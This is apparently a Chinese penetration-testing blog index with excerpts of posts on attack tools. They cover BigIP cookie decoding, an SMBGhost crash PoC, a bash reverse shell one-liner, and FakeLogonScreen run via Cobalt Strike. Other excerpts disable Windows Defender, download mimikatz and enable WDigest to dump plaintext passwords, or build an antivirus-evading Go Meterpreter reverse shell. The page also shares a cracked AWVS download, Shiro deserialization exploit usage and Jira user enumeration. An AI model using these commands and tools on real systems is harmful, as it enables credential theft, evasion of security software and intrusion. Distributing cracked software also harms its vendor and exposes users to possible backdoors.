BigIP Cookie 解码获取真实IP

BIGip是对负载均衡的实现,主要通过Virtual Server、iRules、Pool、Node、Monitor和Persistent(会话保持)实现。BIGip在实现会话保持机制时会在用户首次发起请求时,会为用户设置一个cookie,即服务端会添加set-cookie响应头头(比如:Set-Cookie: BIGipServerFinanceAndAdminWebfo.unc.edu=105389996.20480.0000 )。后续的请求会判断并使用这个cookie值,服务端解码该cookie并使用服务器。

最近发现一款工具,可以解BigIP的cookie,以此获取内网ip或者真实ip地址。这款工具名叫rabid,是ruby语言编写,支持4种cookie格式。github地址:https://github.com/Orange-Cyberdefense/rabid

工具使用

工具使用ruby编写,需要ruby 2.4以上版本的环境。首先要保证安装好ruby。然后使用gem安装包

gem install rabid

安装完成后,可以使用ruby包含该库,也可以直接运行命令执行。

命令示例如下:
rabid 'BIGipServer~FinanceAndAdminWeb~fo.unc.edu=105389996.20480.0000'

上面的参数就是set-cookie的值。

运行结果(运行环境macos,ruby 2.6.3):

阅读全文 »

SMBGhost 蓝屏代码(测试成功)

CVE-2020-0796 蓝屏的代码。twitter上发现的。本地虚拟机,Windows10专业版1903测试成功.

使用方法:

安装impacket库

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python setup.py install

直接使用pip安装的不行,所以clone最新版本的,然后安装,在Mac系统下需要sudo权限。

安装成功后,下载该代码。执行如下命令:

阅读全文 »

分享个学习shell脚本或辅助理解的网站-explainshell.com

有的时候我们会遇到一些特别难理解的shell命令,或者是一些参数我们不知道它的作用。那么今天分享的这个网址可以帮助解决上面的烦恼。

网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 为例(如下图),很酷~

阅读全文 »

伪造windows登录屏幕窃取密码之FakeLogonScreen

在windows环境中,获取系统密码,提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。

简介

FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。

另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。

这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。

运行环境

由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。

利用

可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe 。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:

阅读全文 »

Windows Server 2016抓取明文密码

临时禁止Windows Defender

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force

下载mimikatz后解压缩。

powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"

修改注册表开启UseLogonCredential

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

等用户下次再登录的时候,可抓到明文密码

mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit

Golang实现的x86下的Meterpreter reverse tcp

Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter

做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。

使用方法

修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。

set GOARCH=386
go build -ldflags="-H windowsgui -w"   

注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。

由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。

免杀效果

加入了Bypass AV的代码。

我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。

今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。

VT检测结果地址:https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection

在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。

阅读全文 »

Acunetix Web Vulnerability Scanner(AWVS) 13 破解版

今天看到有群里分享Acunetix Web Vulnerability Scanner(AWVS)13的破解版本,这里分享一下~

Windows下载地址:
https://pan.baidu.com/s/10y_nGpe-rLHqRoyB4Hz3BQ

Linux 下载地址:
https://mega.nz/#!JAxkRQgB!RcaAd5-zHKTNQHD28YcAocKB4RVoNDrOZRnL5bCLj0g

官网介绍地址
https://www.acunetix.com/vulnerability-scanner/

注:工具来源于网络,请自行验证是否存在后门等情况,为了安全考虑建议使用虚拟机运行。

Apache Shiro 反序列化漏洞利用工具使用

Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。

工具下载地址:Shiro_Exploit

该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。

环境

Python2.7

requests

Jdk 1.8

使用说明

usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]

OPTIONS:
-h, --help            show this help message and exit
-u URL, --url URL     Target url.
-t TYPE, --type TYPE  Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
                        gadget
-p PARAMS, --params PARAMS
                        gadget params
-k KEY, --key KEY     CipherKey

Example: python shiro_exploit.py -u target

检测默认只需要使用-u参数即可。

检测可用gadget的方式可以运行

python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="

程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。

阅读全文 »

CVE-2019-8449 Jira 枚举用户漏洞的利用

一个很攻击门槛很低的漏洞。可结合其它漏洞配合来进行攻击。

首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。

2020年2月3日在exploit-db上公布了该漏洞利用脚本。地址:
Jira 8.3.4 - Information Disclosure (Username Enumeration)

其漏洞很简单,只需要访问 http://target/rest/api/latest/groupuserpicker?query=admin (target为目标jira系统地址)。如果返回的是json字符串就说明存在漏洞。如果返回"You are not authenticated. Authentication required to perform this operation." 则说明不存在这个漏洞。

那漏洞应该如何利用呢?
1、通过字典方式,探测用户是否存在。
2、如果存在漏洞,那么一旦匹配到结果,则会返回json格式的字符串,其中包含来用户民、邮箱、和显示的名字信息。在实际测试中发现,请求的参数不一定是用户的全拼,例如我们输入c,也是可以返回相关结果的。我们可以改变query参数的值,从a至z遍历。这样就可以获取系统中的用户名列表。

通过以上获取信息后,可以进行后续的利用。比如爆破用户密码,邮箱密码,发送钓鱼邮件等等。具体根据实际场景和相关经验进行扩展。

相关连接

  1. Jira 8.3.4 - Information Disclosure (Username Enumeration)

  2. More Jira Enumeration (usernames) – CVE-2019-8449

  3. User enumeration through the groupuserpicker api resource - CVE-2019-8449